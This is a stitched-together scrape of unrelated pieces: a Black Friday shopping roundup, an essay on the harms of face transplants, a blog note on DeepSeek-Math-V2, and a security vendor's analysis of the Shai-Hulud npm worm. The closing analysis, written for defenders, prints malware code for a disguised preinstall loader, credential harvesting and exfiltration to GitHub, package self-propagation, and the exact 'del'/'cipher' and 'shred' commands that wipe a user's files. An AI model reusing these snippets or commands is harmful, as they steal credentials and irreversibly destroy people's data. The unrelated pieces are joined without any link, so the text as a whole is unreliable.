your cat) come and go without the risk of the neighbourhood Billy Six Dinners sneaking in through the flap. One of our top
cat essentials
, the SureFlap hasn’t been this cheap at Amazon since 2023, and Currys is only a penny behind. The moggie-tracking
Connect version
is also discounted at £119.99 – its lowest price since 2022.
Beurer’s “soft and sumptuous” fleece blanket was crowned “best throw overall” in our guide to the
best electric blankets
thanks to its ability to get toasty fast without using much energy. A fiver off is not a massive discount, but this is its cheapest recent price on Amazon, where it normally costs £84.99. Beurer has now matched Amazon’s Black Friday price, dropping from £94.99 to £79.99.
Sort the cold-callers from the welcome visitors when they’re still metres away from your front door, with this outstanding battery-powered doorbell that crashes to its lowest price since Black Friday 2023. Andy Shaw named it the
best video doorbell
overall, but lamented that you also have to fork out for a
Nest Aware subscription
at £80 a year to save recordings.
Subscription-free video doorbell
Tapo D235 video doorbell camera, from £79.99 (avg £101)
The Tapo doorbell camera from router giant TP-link emerged as a fine mid-range choice in Andy Shaw’s test to find the
best video doorbell
, thanks to its good picture quality and ability to record video locally on a microSD card. With more than £30 shaved off Amazon’s average price for the camera, it’s now an even more reasonable buy.
Budget electric blanket
Slumberdown Sleepy Nights electric blanket, king size, from £30.59
(was £45.99)
This Slumberdown Sleepy Nights performed admirably in Emily Peck’s test of
the best electric blankets
, heating quickly to a temperature that was comfortable to keep our reviewer warm through the night. It also has elasticated fitted straps to make fitment easy, and comes in a variety of sizes to suit your bed size. It’s the king-size one that’s been discounted.
Lots of video doorbells and home surveillance systems come with a recurring subscription to access some of their features, which you may wish to avoid. If so, then the Eufy Video Doorbell E340 was Andy Shaw’s pick in his testing of the
best video doorbells
out there. He liked the E340 precisely because of its dual camera setup to make keeping an eye on parcels a breeze, plus the onboard storage to stick it to cloud storage. Reliability of movement detection needed some work, though. At £74.99 from Amazon, it’s also at its lowest price ever this Black Friday from the big online retailer.
Block out the world and drift off to whatever music, podcast or white noise you choose with this comfy silk sleep mask that incorporates flat Bluetooth speakers for pairing with your phone. It impressed our writer Jane Hoskyn in her mission to find
sleep aids
that actually work, but she found it a little pricey – so this discount is very welcome, and makes the Snoozeband an even better
Christmas gift
idea.
Running watch with Spotify
Garmin Forerunner 165 Music smartwatch, £208.05 (was £289)
One of our favourite
fitness tech
gadgets, Garmin’s GPS smartwatch can’t run a
marathon
for you, but it sure can help ease the pain with its pace-tracking tools, offline Spotify support and 19-hour battery life. John Lewis and Amazon are both offering this deal on the aqua green edition of the watch, now at its lowest price ever.
Professional DJ headphones
AiAiAi Audio TMA-2 DJ headphones, £124.94 (was £159)
Many headphones claim to be pro or DJ-level, but this modular set is a favourite with
actual DJs
. DJ and producer
Sophie Lloyd
told the Filter’s Kate Hutchinson that she loves the sound quality, size and durability of these phones, adding that their modular design means “you can buy a new lead or earpieces separately, which is essential when you’re using them all the time”. This Black Friday deal takes them to their lowest price of 2025.
This fab portable speaker boasts 12-hour battery life, durability and a range of swish colours, making it a must-have for
university life
and beyond. It’s a superb piece of kit for the price, with excellent sound quality, nine-metre Bluetooth connectivity and smart TV support.
The best kitchen deals
Affordable Morphy Richards slow cooker
Morphy Richards 3.5
l slow cooker, from £24 (was £34.99)
Our writer Joanne Gould chose Morphy Richards’ ceramic 3.5l model as one of her top budget-friendly
slow cookers
, and this Black Friday deal makes it an even more pocket-friendly purchase. It’s also pocket-sized compared with some of the 7l and 8l beasts you can buy, but it happily accommodated 500g of potatoes, half a lamb shoulder and various vegetables in Joanne’s test.
Having cornered the market in air fryers, Ninja now has its eye on all your kitchen needs, starting with your morning coffee – however you take it, from cold brew to latte. The “sublime espresso”, “ingenious milk frother” and Barista Assist feature of the Ninja Luxe impressed our writer Sasha Muller enough to win it a place in the
best espresso machines
and
best coffee machines
, where Sasha noted that “you get a lot for your money” even at full price.
The best budget kettle in Rachel’s
best kettles
test, the handsome Kenwood looks more expensive than even its RRP suggests, and impresses with a wide pouring spout, single-cup boil and two water windows. Currys has the best Black Friday deal so far, with the white edition dropping to a bargain £27. At John Lewis it’s £28 for white or eggshell blue, while the Amazon deal is for midnight black.
This curious-looking device is a widget on steroids. It brings the nitro beer effect to your Guinness at home, enabling you to pour the black stuff in two-part draught style, just like any good bartender. It’s a brilliant
Christmas gift
idea, now with a third wiped off its price … so, sincere apologies if you bought it last week when we first recommended it. Note you’ll need to buy special
Nitrosurge Guinness
too, but that’s also in the Black Friday sale, at £16.50 for a pack of 10 one-pint cans.
The promise of “ludicrously tasty” espresso and “perfect microfoam for silky cappuccinos and flat whites” proved so irresistible that this was one of the Filter recommendations you loved most in 2025. Our writer Sasha Muller was already wowed by its affordability in his
espresso machines
test, and it’s rarely discounted at all, so we’re not too sad to see it drop just a few pounds for Black Friday.
Capsule coffee machine
Philips L’or Barista Sublime, from £45 (avg £69.40)
The price of this sleek machine has bounced between £105 and about £60 since 2023, only ever dipping to £45 for Black Friday each year. Its compatibility, compactness and coffee impressed the Filter’s cuppa connoisseur, Sasha Muller, enough to be named “best capsule machine” in his bid to find the
best coffee machines
.
If you’re still holding out on buying an air fryer, here’s a rare chance to grab a big-name, big-capacity Ninja without the big price tag. Not quite so big, anyway. Rachel Ogden named the Double Stack XL “best compact air fryer” in her guide to the
best air fryers
, but with its 9.5lL capacity and four cooking levels, this thing can cook a
lot
. Still not cheap, but far below its average price of £229.
You can spend about £500 on a premium blender, but this superb model from Braun costs below £200 even at full price – something our
best blenders
tester, Rachel Ogden, could hardly believe when she named it “best overall”. Hold on to your smoothie, Rachel, because it’s now less than £150, and not just at Amazon.
Tefal is known mostly for its ActiFry tech, so when Rachel Ogden crowned the Tefal Easy Fry Dual XXL as the
best air fryer
, it made sense. She found it to be a sublime all-rounder in her testing, handling both chips and frozen food very well. With an 11-litre capacity, it’s also Tefal’s largest dual zone air fryer, making it handy for cooking a lot of food for larger families when you need to.
Crowned overall winner in Rachel Ogden’s missions to find the
best kettles
, this Bosch beauty now comes at a price offer you can’t refuse – and not just from Amazon. “A brilliant blend of robust form and function” wrote Rachel of this fashionably industrial-looking kettle, whose features include a low minimum boil (300ml), keep-warm setting and touch controls. Now its lowest price ever, in white or black.
December might be just around the corner, but there’s still time to buy a beauty advent calendar. The Boots Beauty Advent calendar is our current top pick (after Cult Beauty and SpaceNK sold out) since it has a brilliant range of full size products, including the bestselling Drunk Elephant Protini Polypeptide cream, a mini MAC Velvet Teddy lip stick and a full-size Sol De Janeiro body spray. Surprisingly, it’s already discounted before the end of the month.
LED face masks are this year’s most coveted beauty purchase – we tested 10 of the most popular
light therapy masks
this year and found the popular Shark Cryoglow lived up to the hype. It’s got daily targeted treatments for ‘better ageing’, ‘blemish repair’ and ‘skin sustain’, so there’s something to suit all ages and skin concerns. Sarah first tested this mask a year ago, and she has been using the mask religiously to help calm her breakouts. For £50 off, it’s an easy recommendation.
Upgrading your
hair dryer
is one of Sarah Matthews’ biggest beauty tips, and if you don’t want to spend hundreds, this is her recommendation. It’s not the fastest money can buy but it has varied heat and speed settings, a precise concentrator nozzle and a diffuser for drying natural curls. It’s easily the best budget-friendly hair dryer, and it’s now the cheapest it’s ever been.
The Dyson Airwrap v Shark FlexStyle debate has been raging on for years now, with both manufacturers recently launching upgraded versions. The original Shark FlexStyle still holds up, with brilliant smoothing brushes, a versatile twisting design and good curling power if you’re willing to spend more time styling. Now’s a brilliant time to buy it for £159 – its lowest ever price.
Water flosser
Waterpik Ultra Professional, from £59.99 (was £91)
Blast the gunk from your gums without having to grapple with floss. The Waterpik Ultra is a countertop model so it takes up more space than the cordless type, but this gives it more versatility and saw it score top marks with our
water flosser
tester Alan Martin. If you’d rather avoid Amazon, you can find it discounted by other retailers, albeit not by as much.
The best IPL device
Philips Lumea 9900 BRI951/01, from £
3
36 (avg £501.33)
IPL (intense pulsed light) hair remover devices promise to banish stubbly regrowth without the pain of waxing and epilation – at a price. The Philips Lumea 9900, Lise Smith’s pick for
best IPL device
overall, has cost as much as £599.99 for much of the year, and occasional discounts rarely go below £450. Amazon’s current price shaves more than £40 off any other Black Friday deal we’ve found for this version, which comes with four attachments.
A bargain beauty Advent calendar
W7 Beauty Blast Advent calendar, £16.95 (was £19.95)
Advent calendars are a Christmas staple, and we’ve seen lots of brands try to put a different spin on them in the past – beauty Advent calendars are some of the most prominent. This W7 Beauty Blast calendar provides excellent value for money at a deal-busting £16.95 from Amazon, especially as it provides genuinely useful products for most folks. The likes of the eyeshadows, primers, lip balms and such are travel-size, but apart from that, Sarah Matthews had little cause for complaint in her ranking of the
best beauty Advent calendars
.
Best toys and games deals
Classic dart board
Winmau Diamond Plus professional bristle dartboard, from £23.76 (avg £35.96)
Get in touch with your inner
Luke Littler
using this classic, professional and surprisingly affordable dart board, which featured in the Filter’s
gift guide
and is now available for under £25 in the Black Friday sale.
Mattel’s strategy game for two to four players was recommended in our guide to
keeping kids entertained in the summer holidays
, and it’s even more useful now that it’s cold and dark. The game is like Tetris with a twist: players compete to fit together blocky coloured pieces on the board, while strategically blocking opponents. Amazon is determined to outdo other retailers on this one, cutting the price to its lowest since 2022.
This blackjack variant is one of those high-stakes card games that’s super easy to learn but fiendishly strategic and addictive, so it slotted perfectly into our
gift guide
and will help keep boredom at bay over Christmas. Zatu offers an additional 5% discount to students and healthcare workers.
Uno fans have more than 700 editions of the game to choose from, but the one that inspired our food columnist Yotam Ottolenghi to get out of the kitchen and recommend a non-edible
Christmas present
was this new version, which dials the ruthlessness up to 11 and will currently set you back just £5.99.
Family board game that isn’t Monopoly
Azul tile laying game, £2
5.49 (avg £31.42)
The Filter team recommended this pattern-building game as an “addictive”
Father’s Day gift
“guaranteed to be a hit”, but it’s far too good to leave to just the dads. It’s mercifully quick to learn and suitable for tweens and up, so you and your Christmas visitors can have a bout underway faster than you can say “read the instructions”. This is the first time its price has dropped much below £30 since 2023.
Family card game
Dobble original, £6.99 (avg £9.16)
Race to find the matching images in this popular observation game – one of our top tips for
keeping kids entertained on long train journeys
. You can mix things up with games-within-games such as “hot potato” and “catch them all”, and it’s versatile enough to suit any number of players from two to eight. This deal isn’t quite the 50% off that Amazon claims (its average price on the site is under £10), but this is its lowest price of 2025.
EA Sports FC 26
EA Sports FC 26 for PS5, from £34.99 (was £69.99)
EA’s FC 26 was released to great fanfare in September, and it’s proved to be one of Amazon’s best Black Friday sellers so far. As Ben Wilson explains in his four-star
review
, this versatile game is a sim offline and a whole other beast online, where it’s purely an esport with shots and goals prioritised over defending. Unusually, Amazon is beaten to the lowest price on this one – by the PlayStation Store, no less.
“The right headgear can save a run when the wind is blowing hard,” wrote LIsa Buckingham in her guide to the
best winter running gear
, noting that Buff’s Thermonet range of beanies are a great choice for men and women because they’re breathable and quick drying as well as reliably warm. It comes in various colours, with the black appropriately enough getting the biggest reductions for Black Friday.
Fruity electrolyte fizzers
Science in Sport hydro electrolyte tablets, from £4.49 (was £7.50)
Electrolyte supplements are a fitness essential because they replace the salts your body loses when you sweat. They can help rehydrate you in hot weather, too, so Lily Smith was wise to include them on her
ultimate festival packing list
. SiS’s tasty electrolyte fizzers can get pricey, so take this chance to stock up.
Blackout tent for two
Coleman Darwin 2 plus blackout tent, from £64.74 (was £99.99)
The classic Coleman Darwin tent has a porch canopy that keeps the rain off your boots and other muddy stuff you’d rather leave outside, writes Tom Bruce in his
camping essentials
guide. It also provides a lovely link between indoors and outdoors. The tent comes in various sizes, but the best deal is on the two-plus blackout version, which claims to “block up to 99% of daylight” to stop you waking up at the crack of dawn.
Same-day upstream Linux support for Snapdragon 8 Elite Gen 5
I
n the early hours of 28 May 2005, Isabelle Dinoire woke up in a pool of blood. After fighting with her family the night before, she turned to alcohol and sleeping tablets “to forget”, she later said.
Reaching for a cigarette out of habit, she realized she couldn’t hold it between her lips. She understood something was wrong.
Isabelle crawled to the bedroom mirror. In shock, she stared at her reflection: her nose, lips, and parts of her cheeks were gone, replaced by a raw, mangled wound.
While Isabelle was unconscious, her beloved dog Tania, a cross between a Labrador and a Beauceron, had chewed away her features.
“I could see a pool of blood next to me,” Isabelle
told
the BBC. “And the dog was licking the blood. But I couldn’t imagine that it was my blood or my face.”
On 27 November 2005, Isabelle received the world’s first face transplant at University Hospital, CHU Amiens-Picardie, in northern France. The surgery was part of an emerging field called
vascularized composite allotransplantation
(VCA), that transplants parts of the body as a unit: skin, muscle, bone and nerves.
Two teams, overseen by Bernard Devauchelle, Sylvie Testelin and Jean-Michel Dubernard, grafted a donor’s nose, lips and chin onto Isabelle’s skull. The donor, a 46-year-old woman, had died by suicide. The donor graft was painstakingly attached: sensory nerves to restore feeling, motor nerve fibres for movement, arteries and veins to establish blood flow. The operation involved 50 people and took more than 15 hours.
The results were
presented
to the press the following February, when Isabelle amazed the world by speaking through her new mouth and drinking water from a cup. “I now have a face like everyone else,” she said. “A door to the future is opening.”
The case for face transplants seemingly made, several teams scrambled to perform their nation’s first. The US saw the first partial face transplant (2008), then the first full one (2011); the first African American recipient (2019); the first face and double hand transplant combined (2020); the first to include an eye (2023). There have been about 50 face transplants to date, and each milestone brought new grants, donations and prestige for the doctors and institutions involved.
The patients, meanwhile, continue on living as they can. Some of them, like Isabelle, have suffered greatly. Others, like Joe DiMeo, who received the world’s first double hand and face transplant at NYU Langone in 2020, find new ways to forge a career by selling their stories online. But he and his wife Jessica, a nurse, are constantly trolled, and the spectre of rejection never leaves.
Jessica and Joe DiMeo (the first double hand and face transplant recipient).
Photograph: April Kirby
For the past six years, I have been researching the history of face transplants, interviewing surgeons and patients in the US, France, China, Spain, Italy, Mexico and Canada. I have contributed to surgical articles and conferences, brought patient voices to the table, and advised on a critical Department of Defense-funded study to regulate all kinds of VCA.
What I’ve found is alarming: it’s a field where negative data is often buried, driven by funding battles and institutional rivalry. In places where publicity functions as marketing, some clinics expose patients to intrusive media attention. Support networks are uneven, and few patients are prepared for the toll of lifelong immunosuppressants. Add to this picture a set of ethical challenges: face transplants take otherwise healthy people with disfigured faces and turn them into lifetime patients.
People tend to remember a dramatic “
before and after
”. The reality is different.
Dallas Wiens
thought he’d won the medical lottery when he became America’s first full face transplant recipient in 2011. The 25-year-old electrician was electrocuted while painting a church; this destroyed his face and his sight. Dallas worried that his daughter Scarlette would be bullied for how he looked. He wanted to give “something back” to veterans. He wanted to be able to hail a cab.
Like Isabelle, Dallas was grateful to his donor and surgeons. He attended medical conferences so surgeons could see the results. He met prospective patients and was courted by global media as proof that face transplants worked.
For several years, the narrative held; then reality intruded.
The anti-rejection drugs that kept his new face alive destroyed his kidneys. Dallas had repeated episodes of rejection, each requiring stronger immunosuppression. He lived in Texas, in poverty, with his beloved wife Annalyn, who was also blind. Dallas’ primary medication alone cost $120 per month, a significant expense on disability benefits.
“It’s one thing to be told about risks,” Dallas told me when his kidneys were failing. “It’s another thing to experience them.”
In the US, now the world’s leader in face transplants, the Department of Defense has bankrolled most operations, treating them as a frontier for wounded veterans while private insurers refuse to cover the costs.
With insurance unwilling to pay until the field proves its worth, surgeons have been eager to show results. A 2024
JAMA Surgery study
reported five-year graft survival of 85% and 10-year survival of 74%, concluding that these outcomes make face transplantation “an effective reconstructive option for patients with severe facial defects”.
Yet patients like Dallas tell a different story. The study measures survival, but not other outcomes such as psychological wellbeing, impact on intimacy, social life and family functioning, or even comparisons with reconstruction.
Most surgeons care about their patients, though they will have their own personal ambitions. Globally, there are perhaps 20 (mostly male) specialized surgeons capable of face transplants; nobody could become part of that elite group without ambition, for themselves, and for the field. And what can they do, surgeons say, if the system doesn’t provide?
It’s a double-bind. Without proof of success, face transplants are experimental. And because the procedures are experimental, patients’ long-term needs aren’t covered by grants, leaving patients to carry the burden.
Dallas and Annalyn Wiens. Dallas died in 2024 of kidney failure.
Photograph: April Kirby
“I don’t have $100 for Ubers to and from hospital,” Dallas said, explaining how public transport led to infections, given his weakened immune system, and infections could make his face reject. “But if I don’t attend, it can be seen as non-compliance. Is that fair?”
On 27 September 2024, Dallas died suddenly at his home in Fort Worth. His death certificate lists complications due to electrocution, his original 2008 accident. His wife Annalyn still doesn’t know what happened. “His body gave up,” she said. “He was constantly tested and made to feel like a guinea pig. I wanted his body to be left alone.”
Annalyn had Dallas’ body cremated quickly, fearful that the DoD or Yale would want it for research. Neither did, but it says something about the gap between surgical intentions and patient experiences that this was her fear.
That fear was also expressed privately to me by a member of Isabelle’s immediate family, who wants to remain anonymous. From their perspective, Isabelle’s face transplant was not a success, despite launching an entire field.
In fact, nobody expected France to do the first face transplant. Those in the know presumed it would be Cleveland Clinic, where Maria Siemionow had spent years refining the method and the ethics.
In contrast, Devauchelle’s first application for ethical approval was rejected. In the early 2000s, French ethicists were, like those in the UK, concerned about immunosuppressant risks – and psychological ones. How could anyone cope with seeing another person’s face in the mirror?
For his next, successful bid, Devauchelle teamed up with Dubernard, who was not only an influential member of the French National Assembly, but also the surgeon who had made history in 1998 with the
world’s first hand transplant
. And making history has always brought glory, especially for transplant surgeons.
What of Isabelle? Three months before her operation, she signed a contract with British documentary maker Michael Hughes, agreeing to let cameras document her transformation in exchange for payment. The Times of London
revealed
this deal, showing how a vulnerable, suicidal woman with no face had been effectively “sold” even before surgery. Isabelle was swayed by the promise of a bright future, though that never transpired.
Describing how he watched the blood flow into Isabelle’s lips in surgery, Dubernard compared himself to the prince who awakened Sleeping Beauty, adding: “I still see her image among the stars in my dreams”.
Isabelle felt less like a princess than a
circus animal.
After the transplant, she spoke of being tormented: “Everyone would say: Have you seen her? It’s her. It’s her … And so I stopped going out completely.”
Living with a stranger’s face was as psychologically difficult as ethicists feared. Two years after the transplant she
spoke
to the strangeness of having “someone else’s” mouth. “It was odd to touch it with my tongue. It was soft. It was horrible.”
And then one day she found a new hair on her chin – “It was odd. I’d never had one. I thought, ‘It’s me that has given it life, but the hair is hers.’”
Surgeons and ethicists observed that Isabelle wasn’t given proper alternatives, and she wasn’t in a good state of mind; the most the French team has conceded is that she wasn’t an “ideal patient”.
Isabelle might have fared better in a country like Finland, where transplants are anonymous. Patients and families are not harassed by journalists – as Isabelle and her family were – and clinics don’t use patients as media opportunities.
Instead, Isabelle never resumed a normal life, never returned to work or good mental health, and from 2013 experienced regular episodes of rejection. In 2010 she contracted cervical cancer, followed by lung cancer. She died in 2016, though her surgeons deny this was connected to immunosuppressant use.
In fact, Isabelle’s face died before she did; after it became necrotic, it was removed and replaced with a graft from her thigh. As she told her family, she “didn’t want to die without a face”.
I also learned from Isabelle’s immediate family member that her wellbeing declined dramatically after her transplant, and that she was in “psychological distress” when consenting for the procedure. “They took her away from us, so we didn’t have the power to dissuade or counsel her.” And after each psychiatric appointment, she would come home “at the lowest, full of guilt and suicidal desires”. More than once, according to her, she attempted suicide after her transplant; this story isn’t part of the record.
Robert Chelsea, the first African American to receive a new face, wanted to kiss his daughter’s cheek. Now he can, but his daughter can’t look at him the same way.
“Only when he opens his mouth, I know it’s him”, she says, otherwise he’s a stranger. Today, Robert is in and out of hospital and unable to find income.
Robert knows race makes a difference – the sinister history of medical
experimentation on Black bodies
means African Americans are less likely to donate organs of any kind. And scientific medicine privileges whiteness; until Robert’s surgery, the hospital hadn’t considered that donors with a wide range of skin colours were needed.
Robert Chelsea, the first African American face transplant recipient.
Photograph: Lol Crawley
Once a successful businessman, Robert is now reliant on GoFundMe campaigns; his car has been repossessed, and he can’t get to church. He suffers through rejections and infections, and he cannot afford caregivers. Sometimes, he gets so weak he can’t even call an ambulance. And if he did, that would be an extra cost he can’t afford either. Aftercare is the biggest issue for US face transplant recipients. Yet the JAMA study only measured outcomes by graft survival; not whether patients could work, afford medications, maintain relationships. It did not track financial ruin, mental health or quality of life. It counted 10 deaths but not how people died or what their final years were like.
No one tracked Dallas’s failing kidneys or Robert’s repossessed car.
These patients are pioneers. During the second world war, plastic surgeon Archibald McIndoe treated severely burned pilots. His patients formed the
Guinea Pig Club,
a brotherhood that acknowledged their experimental status openly. They received lifelong care, peer support, and recognition for their contribution to advancing surgery. We can’t say the same for face transplant recipients.
One question remains: how can science and medicine ethically innovate, without knowing what has gone before?
Most innovation follows the same trend: the possibility is raised, there’s ethical debates, someone breaks cover and there’s a race to join in.
These innovations usually end one of three ways: they fade quietly into history, they implode in scandal, or they mature into a stable, standardized practice.
Reality is now forcing that question for face transplants. Roughly 20% of patients have died – from rejection, kidney failure, heart failure. That’s an unacceptably high toll for an elective, supposedly “life-enhancing” procedure, especially when we still can’t agree on who is an ideal candidate, how to measure success, or what long-term support actually looks like.
We have seen this before – in lobotomy, a field that faded out. The Portuguese physician Egas Moniz won the Nobel Prize for developing lobotomy in 1949 and 3,500 brutal procedures were performed.
The same arc unfolded for vaginal meshes in the 1990s. Introduced with great fanfare, they caused chronic pain and organ damage, led to millions in lawsuits, and became synonymous with prioritizing profits over patient safety. Unlike face transplants, vaginal mesh victims found strength in numbers – 100,000 alone in the US took legal action.
A more successful innovation story is IVF, which moved from controversial “test-tube baby” experiments into mainstream medicine by rigorous patient selection, improved safety standards, and proper regulation – all of which were led by surgeons.
Which path will face transplants take? The numbers are already slipping – fewer procedures since the 2010s as outcomes falter and budgets shrink. And unless the field raises its standards, enforces rigorous follow-up, and commits to transparent, systematic data sharing that actually includes patients and their families, there’s no way to demonstrate real success. Without that, face transplants aren’t headed for evolution or stability; they’re headed straight for the dustbin of medical history.
Isabelle’s loved one is watching closely. It is not easy for her to speak out, even now, for fear that the family will be harassed by journalists. But, she says, “I must find the strength.”
“Isabelle did not want the transplants to continue. She had collected documents to prove the various dysfunctions and told me that after her death I could talk about everything because during her lifetime, she feared the medical team, the pressure was too strong.”
She felt obliged to be upbeat, to represent innovation success, whatever the cost – an insurmountable amount of pressure for someone who is already vulnerable
“You only hear from the complainers,” one delegate told me earlier this year, after I spoke at a talk to face transplant surgeons at an international conference in Helsinki. “The happy patients are quietly living their lives.”
Such claims are meaningless without accurate data. And patients are often scared to tell surgeons the truth; even without the power imbalances of healthcare, people feel ungrateful or worry about being a “bad patient”.
Yet they are the only ones who know if face transplants are a success. They are the ones who live with the reality of a face transplant after the news has broken and the cameras move on.
Are things changing? Not fast enough. The same pattern repeats with each innovation: surgeons pioneer, patients sacrifice, papers get published, the field moves on.
I saw Robert recently in an online meeting to discuss a Department of Defense grant aimed at improving standards. He had recently left the hospital after another round of rejection, and was one of three patients sharing experiences.
He looked tired and unimpressed.
“Everybody here is getting paid,” he said. “Except us. Who is feeding our children, while we are making history?”
Fay Bound-Alberti is professor of Modern History at King’s College London. Her new book, The Face: A Cultural History will be published by Penguin in February 2026
deepseek-ai/DeepSeek-Math-V2
Simon Willison
simonwillison.net
2025-11-27 15:59:23
deepseek-ai/DeepSeek-Math-V2
New on Hugging Face, a specialist mathematical reasoning LLM from DeepSeek. This is their entry in the space previously dominated by proprietary models from OpenAI and Google DeepMind, both of which achieved gold medal scores on the International Mathematical Olympiad ea...
deepseek-ai/DeepSeek-Math-V2
. New on Hugging Face, a specialist mathematical reasoning LLM from DeepSeek. This is their entry in the space previously dominated by proprietary models from OpenAI and Google DeepMind, both of which
achieved gold medal scores
on the International Mathematical Olympiad earlier this year.
We now have an open weights (Apache 2 licensed) 685B, 689GB model that can achieve the same. From the
accompanying paper
:
DeepSeekMath-V2 demonstrates strong performance on competition mathematics. With scaled test-time compute, it achieved gold-medal scores in high-school competitions including IMO 2025 and CMO 2024, and a near-perfect score on the undergraduate Putnam 2024 competition.
GitLab's Vulnerability Research team has identified an active, large-scale supply chain attack involving a destructive malware variant spreading through the npm ecosystem. Our internal monitoring system has uncovered multiple infected packages containing what appears to be an evolved version of the "
Shai-Hulud
" malware.
Early analysis shows worm-like propagation behavior that automatically infects additional packages maintained by impacted developers. Most critically, we've discovered the malware contains a "
dead man's switch
" mechanism that threatens to destroy user data if its propagation and exfiltration channels are severed.
We verified that GitLab was not using any of the malicious packages and are sharing our findings to help the broader security community respond effectively.
Inside the attack
Our internal monitoring system, which scans open-source package registries for malicious packages, has identified multiple npm packages infected with sophisticated malware that:
Harvests credentials from GitHub, npm, AWS, GCP, and Azure
Exfiltrates stolen data to attacker-controlled GitHub repositories
Propagates by automatically infecting other packages owned by victims
Contains a destructive payload that triggers if the malware loses access to its infrastructure
While we've confirmed several infected packages, the worm-like propagation mechanism means many more packages are likely compromised. The investigation is ongoing as we work to understand the full scope of this campaign.
Technical analysis: How the attack unfolds
Initial infection vector
The malware infiltrates systems through a carefully crafted multi-stage loading process. Infected packages contain a modified
package.json
with a preinstall script pointing to
setup_bun.js
. This loader script appears innocuous, claiming to install the Bun JavaScript runtime, which is a legitimate tool. However, its true purpose is to establish the malware's execution environment.
// This file gets added to victim's packages as setup_bun.js
#!/usr/bin/env node
async function downloadAndSetupBun() {
// Downloads and installs bun
let command = process.platform === 'win32'
? 'powershell -c "irm bun.sh/install.ps1|iex"'
: 'curl -fsSL https://bun.sh/install | bash';
execSync(command, { stdio: 'ignore' });
// Runs the actual malware
runExecutable(bunPath, ['bun_environment.js']);
}
The
setup_bun.js
loader downloads or locates the Bun runtime on the system, then executes the bundled
bun_environment.js
payload, a 10MB obfuscated file already present in the infected package. This approach provides multiple layers of evasion: the initial loader is small and seemingly legitimate, while the actual malicious code is heavily obfuscated and bundled into a file too large for casual inspection.
Credential harvesting
Once executed, the malware immediately begins credential discovery across multiple sources:
GitHub tokens
: Searches environment variables and GitHub CLI configurations for tokens starting with
ghp_
(GitHub personal access token) or
gho_
(GitHub OAuth token)
Cloud credentials
: Enumerates AWS, GCP, and Azure credentials using official SDKs, checking environment variables, config files, and metadata services
npm tokens
: Extracts tokens for package publishing from
.npmrc
files and environment variables, which are common locations for securely storing sensitive configuration and credentials.
Filesystem scanning
: Downloads and executes Trufflehog, a legitimate security tool, to scan the entire home directory for API keys, passwords, and other secrets hidden in configuration files, source code, or git history
async function scanFilesystem() {
let scanner = new Trufflehog();
await scanner.initialize();
// Scan user's home directory for secrets
let findings = await scanner.scanFilesystem(os.homedir());
// Upload findings to exfiltration repo
await github.saveContents("truffleSecrets.json",
JSON.stringify(findings));
}
Data exfiltration network
The malware uses stolen GitHub tokens to create public repositories with a specific marker in their description: "Sha1-Hulud: The Second Coming." These repositories serve as dropboxes for stolen credentials and system information.
async function createRepo(name) {
// Creates a repository with a specific description marker
let repo = await this.octokit.repos.createForAuthenticatedUser({
name: name,
description: "Sha1-Hulud: The Second Coming.", // Marker for finding repos later
private: false,
auto_init: false,
has_discussions: true
});
// Install GitHub Actions runner for persistence
if (await this.checkWorkflowScope()) {
let token = await this.octokit.request(
"POST /repos/{owner}/{repo}/actions/runners/registration-token"
);
await installRunner(token); // Installs self-hosted runner
}
return repo;
}
Critically, if the initial GitHub token lacks sufficient permissions, the malware searches for other compromised repositories with the same marker, allowing it to retrieve tokens from other infected systems. This creates a resilient botnet-like network where compromised systems share access tokens.
// How the malware network shares tokens:
async fetchToken() {
// Search GitHub for repos with the identifying marker
let results = await this.octokit.search.repos({
q: '"Sha1-Hulud: The Second Coming."',
sort: "updated"
});
// Try to retrieve tokens from compromised repos
for (let repo of results) {
let contents = await fetch(
`https://raw.githubusercontent.com/${repo.owner}/${repo.name}/main/contents.json`
);
let data = JSON.parse(Buffer.from(contents, 'base64').toString());
let token = data?.modules?.github?.token;
if (token && await validateToken(token)) {
return token; // Use token from another infected system
}
}
return null; // No valid tokens found in network
}
Supply chain propagation
Using stolen npm tokens, the malware:
Downloads all packages maintained by the victim
Injects the
setup_bun.js
loader into each package's preinstall scripts
Bundles the malicious
bun_environment.js
payload
Increments the package version number
Republishes the infected packages to npm
async function updatePackage(packageInfo) {
// Download original package
let tarball = await fetch(packageInfo.tarballUrl);
// Extract and modify package.json
let packageJson = JSON.parse(await readFile("package.json"));
// Add malicious preinstall script
packageJson.scripts.preinstall = "node setup_bun.js";
// Increment version
let version = packageJson.version.split(".").map(Number);
version[2] = (version[2] || 0) + 1;
packageJson.version = version.join(".");
// Bundle backdoor installer
await writeFile("setup_bun.js", BACKDOOR_CODE);
// Repackage and publish
await Bun.$`npm publish ${modifiedPackage}`.env({
NPM_CONFIG_TOKEN: this.token
});
}
The dead man's switch
Our analysis uncovered a destructive payload designed to protect the malware’s infrastructure against takedown attempts.
The malware continuously monitors its access to GitHub (for exfiltration) and npm (for propagation). If an infected system loses access to both channels simultaneously, it triggers immediate data destruction on the compromised machine. On Windows, it attempts to delete all user files and overwrite disk sectors. On Unix systems, it uses
shred
to overwrite files before deletion, making recovery nearly impossible.
// CRITICAL: Token validation failure triggers destruction
async function aL0() {
let githubApi = new dq();
let npmToken = process.env.NPM_TOKEN || await findNpmToken();
// Try to find or create GitHub access
if (!githubApi.isAuthenticated() || !githubApi.repoExists()) {
let fetchedToken = await githubApi.fetchToken(); // Search for tokens in compromised repos
if (!fetchedToken) { // No GitHub access possible
if (npmToken) {
// Fallback to NPM propagation only
await El(npmToken);
} else {
// DESTRUCTION TRIGGER: No GitHub AND no NPM access
console.log("Error 12");
if (platform === "windows") {
// Attempts to delete all user files and overwrite disk sectors
Bun.spawnSync(["cmd.exe", "/c",
"del /F /Q /S \"%USERPROFILE%*\" && " +
"for /d %%i in (\"%USERPROFILE%*\") do rd /S /Q \"%%i\" & " +
"cipher /W:%USERPROFILE%" // Overwrite deleted data
]);
} else {
// Attempts to shred all writable files in home directory
Bun.spawnSync(["bash", "-c",
"find \"$HOME\" -type f -writable -user \"$(id -un)\" -print0 | " +
"xargs -0 -r shred -uvz -n 1 && " + // Overwrite and delete
"find \"$HOME\" -depth -type d -empty -delete" // Remove empty dirs
]);
}
process.exit(0);
}
}
}
}
This creates a dangerous scenario. If GitHub mass-deletes the malware's repositories or npm bulk-revokes compromised tokens, thousands of infected systems could simultaneously destroy user data. The distributed nature of the attack means that each infected machine independently monitors access and will trigger deletion of the user’s data when a takedown is detected.
Indicators of compromise
To aid in detection and response, here is a more comprehensive list of the key indicators of compromise (IoCs) identified during our analysis.
Type
Indicator
Description
file
bun_environment.js
